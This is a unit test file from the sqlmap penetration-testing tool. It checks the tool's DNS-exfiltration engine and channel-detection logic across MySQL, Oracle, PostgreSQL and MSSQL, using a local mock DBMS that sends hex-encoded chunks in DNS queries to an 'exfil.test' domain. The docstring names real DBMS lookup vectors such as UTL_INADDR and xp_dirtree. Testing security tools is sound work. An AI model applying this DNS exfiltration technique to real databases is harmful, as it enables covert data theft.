#!/usr/bin/env python """ Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission The DNS-exfiltration extraction engine (lib/techniques/dns/use.py dnsUse) and the channel-detection probe (lib/techniques/dns/test.py dnsTest). DNS exfil is normally driven by a back-end DBMS that performs an actual DNS lookup of an attacker-controlled hostname (Oracle UTL_INADDR, MSSQL xp_dirtree, ...), encoding the queried data in the subdomain labels which then reach sqlmap's in-process DNS server. That DBMS behaviour cannot be reproduced locally without a real DNS-emitting engine, so here we drive the REAL dnsUse()/dnsTest() logic + the REAL DNSServer (on a high port, no root) and emulate ONLY that one step: a mock Request.queryPage plays the DBMS - it takes the per-iteration boundaries dnsUse generated and fires a genuine UDP DNS query for 'prefix..suffix.domain' at the DNS server. So the chunking/offset/reassembly loop, the dns_request snippet rendering, the DNSServer packet parse, pop(prefix,suffix), regex extraction, hex decoding and the detection-then-disable logic are all exercised for real; if any of them regress these go red - without a live DBMS. NOTE on fidelity: secrets are kept ASCII so the mock's byte-slice chunking matches a DBMS character-substring exactly. Multi-byte (UTF-8) values, where DBMS SUBSTRING is character-based and a chunk could split a code point, need the real-DBMS run. """ import binascii import os import socket import struct import sys import threading import time import unittest sys.path.insert(0, os.path.dirname(os.path.abspath(__file__))) from _testutils import bootstrap, set_dbms bootstrap() from lib.core.agent import agent from lib.core.common import Backend from lib.core.data import conf, kb from lib.core.threads import getCurrentThreadData from lib.core.enums import DBMS from lib.core.exception import SqlmapNotVulnerableException from lib.core.settings import DNS_BOUNDARIES_ALPHABET from lib.core.settings import MAX_DNS_LABEL from lib.request.connect import Connect from lib.request.dns import DNSServer import lib.techniques.dns.use as dnsmod import lib.techniques.dns.test as dnstestmod def _build_query(name, tid=b"\x12\x34"): pkt = tid + b"\x01\x00" + b"\x00\x01" + b"\x00\x00" + b"\x00\x00" + b"\x00\x00" for label in name.split("."): if label: pkt += struct.pack("B", len(label)) + label.encode() return pkt + b"\x00" + b"\x00\x01" + b"\x00\x01" class _HighPortDNSServer(DNSServer): # same logic as the real server (parse/pop/run), just bound high so no root is needed def __init__(self, port=0): self._requests = [] self._lock = threading.Lock() self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self._socket.bind(("127.0.0.1", port)) self.port = self._socket.getsockname()[1] self._running = False self._initialized = False def close(self): self._running = False try: self._socket.close() except socket.error: pass _CONF = {"dnsDomain": "exfil.test", "hexConvert": False, "api": False, "verbose": 0, "forceDns": False} _KB = {"dnsTest": True, "dnsMode": False, "bruteMode": False, "safeCharEncode": False} class _DnsCase(unittest.TestCase): DBMS_NAME = "MySQL" @classmethod def setUpClass(cls): cls.server = _HighPortDNSServer() cls.server.run() # bounded wait: never spin indefinitely if the in-process server fails to bind/init # (e.g. a taken port on CI) - fail loudly instead of hanging the whole suite deadline = time.time() + 10 while not cls.server._initialized: if time.time() > deadline: raise RuntimeError("in-process DNS test server failed to initialize within 10s") time.sleep(0.02) @classmethod def tearDownClass(cls): server = getattr(cls, "server", None) if server is not None: server.close() cls.server = None def setUp(self): self._saved_conf = {k: conf.get(k) for k in _CONF} self._saved_kb = {k: kb.get(k) for k in _KB} self._saved_qp = Connect.queryPage self._saved_randomStr = dnsmod.randomStr self._saved_randomInt = dnstestmod.randomInt self._saved_dnsServer = conf.get("dnsServer") self._saved_hdbR, self._saved_hdbW = dnsmod.hashDBRetrieve, dnsmod.hashDBWrite # the DNS exfil path prints its own "[INFO] retrieved: ..." progress straight to stdout # via dataToStdout() (it bypasses the logger, so the suite's log-level silencing can't # catch it); suppress it through sqlmap's own per-thread stdout gate so the run stays clean self._saved_disableStdOut = getCurrentThreadData().disableStdOut getCurrentThreadData().disableStdOut = True for k, v in _CONF.items(): conf[k] = v for k, v in _KB.items(): kb[k] = v conf.dnsServer = self.server # isolate from the session hash DB (avoid cross-test value caching / uninitialized store) dnsmod.hashDBRetrieve = lambda *a, **k: None dnsmod.hashDBWrite = lambda *a, **k: None # MSSQL/PostgreSQL build the payload via the stacked-query injection plumbing # (agent.prefixQuery/agent.payload, needing a full kb.injection). That plumbing is # generic - not DNS logic - and the mock oracle ignores the payload, so stub it to a # pass-through; the DNS-specific snippet/substring/chunking still runs for real. self._saved_prefixQuery, self._saved_payload = agent.prefixQuery, agent.payload agent.prefixQuery = lambda expression, *a, **k: expression agent.payload = lambda place=None, parameter=None, value=None, newValue=None, where=None: newValue or "" set_dbms(self.DBMS_NAME) def tearDown(self): getCurrentThreadData().disableStdOut = self._saved_disableStdOut for k, v in self._saved_conf.items(): conf[k] = v for k, v in self._saved_kb.items(): kb[k] = v conf.dnsServer = self._saved_dnsServer Connect.queryPage = self._saved_qp dnsmod.Request.queryPage = self._saved_qp dnsmod.randomStr = self._saved_randomStr dnstestmod.randomInt = self._saved_randomInt dnsmod.hashDBRetrieve, dnsmod.hashDBWrite = self._saved_hdbR, self._saved_hdbW agent.prefixQuery, agent.payload = self._saved_prefixQuery, self._saved_payload def _install_oracle(self, secret, working=True, force=None): """ Installs a mock queryPage that plays the DBMS: for each dnsUse iteration it fires a real UDP DNS query carrying the next hex chunk of L{secret}. working=False models a dead DNS channel (the DBMS never emits a lookup). force=(prefix, suffix) pins the random boundary labels (to construct adversarial cases like a domain/suffix collision). """ secret_bytes = secret.encode("utf-8") boundaries = [] served = [0] real_randomStr = self._saved_randomStr def spy_randomStr(length=4, alphabet=None, **kw): if alphabet == DNS_BOUNDARIES_ALPHABET and length == 3: out = force[len(boundaries) % 2] if force else real_randomStr(length=length, alphabet=alphabet, **kw) boundaries.append(out) return out return real_randomStr(length=length, alphabet=alphabet, **kw) if alphabet is not None else real_randomStr(length=length, **kw) dnsmod.randomStr = spy_randomStr dbms = Backend.getIdentifiedDbms() chunk_length = MAX_DNS_LABEL // 2 if dbms in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL // 4 - 2 def oracle(payload=None, *args, **kwargs): if not working: return None prefix, suffix = boundaries[-2], boundaries[-1] chunk = secret_bytes[served[0]:served[0] + chunk_length] if chunk: host = "%s.%s.%s.%s" % (prefix, binascii.hexlify(chunk).decode(), suffix, conf.dnsDomain) c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) c.settimeout(3) c.sendto(_build_query(host), ("127.0.0.1", self.server.port)) try: c.recvfrom(512) finally: c.close() served[0] += len(chunk) for _ in range(100): with self.server._lock: if any(host.encode() in r for r in self.server._requests): break time.sleep(0.01) return None Connect.queryPage = staticmethod(oracle) dnsmod.Request.queryPage = staticmethod(oracle) def _extract(self, secret): self._install_oracle(secret) return dnsmod.dnsUse("%s AND %d=%d", "user()") class TestDnsExfilEngine(_DnsCase): DBMS_NAME = "MySQL" def test_short_value(self): self.assertEqual(self._extract("luther"), "luther") def test_value_spanning_multiple_dns_labels(self): # > one DNS label -> forces the chunking/offset/reassembly loop (multiple queries) secret = "The quick brown fox jumps over the lazy dog 0123456789 abcdef" self.assertEqual(self._extract(secret), secret) def test_exact_chunk_boundary(self): # length exactly one chunk: last-chunk break condition (len < chunk_length) edge dbms = Backend.getIdentifiedDbms() cl = MAX_DNS_LABEL // 2 if dbms in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL // 4 - 2 secret = "A" * cl self.assertEqual(self._extract(secret), secret) def test_special_characters(self): secret = "p@ss W0rd!#%&" self.assertEqual(self._extract(secret), secret) def test_domain_label_colliding_with_suffix(self): # adversarial: --dns-domain's leading label equals the random suffix. A greedy # extraction regex would run past the real boundary into the domain and corrupt the # value; the (lazy) extraction must still recover it exactly. conf.dnsDomain = "hhh.exfil.test" # leading label 'hhh' == forced suffix self._install_oracle("luther", force=("ggg", "hhh")) self.assertEqual(dnsmod.dnsUse("%s AND %d=%d", "user()"), "luther") class TestDnsExfilEngineOracle(TestDnsExfilEngine): # Oracle: different dns_request snippet (UTL_INADDR.GET_HOST_ADDRESS, '||' concat) and # SUBSTRC substring template - re-runs the whole battery through the Oracle dialect. DBMS_NAME = "Oracle" class TestDnsExfilEnginePostgres(TestDnsExfilEngine): # PostgreSQL: stacked-query branch (agent.payload), plpgsql COPY dns_request snippet, # 'SUBSTRING((...)::text FROM x FOR y)' substring template. DBMS_NAME = "PostgreSQL" class TestDnsExfilEngineMssql(TestDnsExfilEngine): # MSSQL: stacked-query branch, xp_dirtree dns_request snippet, and crucially a SMALLER # chunk_length (MAX_DNS_LABEL//4 - 2) - exercises the alternate chunking arithmetic. DBMS_NAME = "Microsoft SQL Server" class TestDnsLabelInvariant(unittest.TestCase): """The exfil chunk is hex-encoded into ONE DNS label, so 2*chunk_length must never exceed the 63-octet DNS label limit - otherwise the query carries an invalid (over-long) label and exfil silently breaks. Guards the chunk_length arithmetic in dnsUse for every supported DBMS.""" def test_hex_label_within_max_dns_label(self): for dbms in (DBMS.MYSQL, DBMS.ORACLE, DBMS.PGSQL, DBMS.MSSQL): chunk_length = MAX_DNS_LABEL // 2 if dbms in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL // 4 - 2 self.assertGreater(chunk_length, 0, "%s: non-positive chunk_length" % dbms) self.assertLessEqual(2 * chunk_length, MAX_DNS_LABEL, "%s: hex label (%d) exceeds MAX_DNS_LABEL (%d)" % (dbms, 2 * chunk_length, MAX_DNS_LABEL)) class TestDnsChannelDetection(_DnsCase): """dnsTest(): probes the channel with a known random integer and disables DNS exfil if the value doesn't come back (unless --force-dns, which then aborts).""" DBMS_NAME = "MySQL" KNOWN = 4815162342 def _patch_known_int(self): dnstestmod.randomInt = lambda *a, **k: self.KNOWN def test_detection_success_keeps_channel(self): self._patch_known_int() self._install_oracle(str(self.KNOWN), working=True) dnstestmod.dnsTest("%s AND %d=%d") self.assertTrue(kb.dnsTest) self.assertEqual(conf.dnsDomain, "exfil.test") # channel kept def test_detection_failure_disables_channel(self): self._patch_known_int() self._install_oracle(str(self.KNOWN), working=False) # dead channel dnstestmod.dnsTest("%s AND %d=%d") self.assertFalse(kb.dnsTest) self.assertIsNone(conf.dnsDomain) # exfil turned off def test_detection_failure_with_force_dns_raises(self): self._patch_known_int() conf.forceDns = True self._install_oracle(str(self.KNOWN), working=False) self.assertRaises(SqlmapNotVulnerableException, dnstestmod.dnsTest, "%s AND %d=%d") if __name__ == "__main__": unittest.main(verbosity=2)